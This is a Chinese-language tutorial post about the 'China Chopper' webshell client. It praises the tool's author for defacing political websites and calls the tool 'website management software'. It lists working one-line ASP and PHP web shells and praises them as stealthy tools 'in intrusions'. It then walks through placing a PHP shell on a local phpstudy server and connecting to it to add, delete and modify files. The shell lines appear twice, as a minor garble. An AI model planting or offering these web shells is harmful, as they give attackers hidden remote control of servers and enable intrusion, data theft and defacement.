中国菜刀的由来:
说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了C++/J2ME/PHP/JSP/ASP.NET等等十数种计算机语言,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页,一举成名。
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。
常用一句话木马如下:
asp一句话木马:
<%execute(request("value"))%>
php一句话木马:
<?php @eval($_POST[value]);?>
<%execute(request("value"))%>
php一句话木马:
<?php @eval($_POST[value]);?>
下面是通过php一句话木马来连接服务器。操作流程如下:
前提准备条件:
1.搭建php+mysql环境,我用的是phpstudy。
2.中国菜刀软件。
3.php一句话木马。
代码为:<?php @eval($_POST['test']);?> 文件名为one.php。
代码意思是:通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。如果没有在代码字符串中调用return语句,则返回NULL。如果代码中存在解析错误,则eval()函数返回false。其中test就是通过菜刀连接一句话的密码。
一、将文件名one.php放入phpstudy网站根目录下。如下图所示:
二、打开中国菜刀软件,进行连接操作,看是否能够连接服务器,如下图所示:
三、当点击添加时,就顺利的连接上服务器。此时可以在服务器进行增加、删除、修改操作。如下图所示: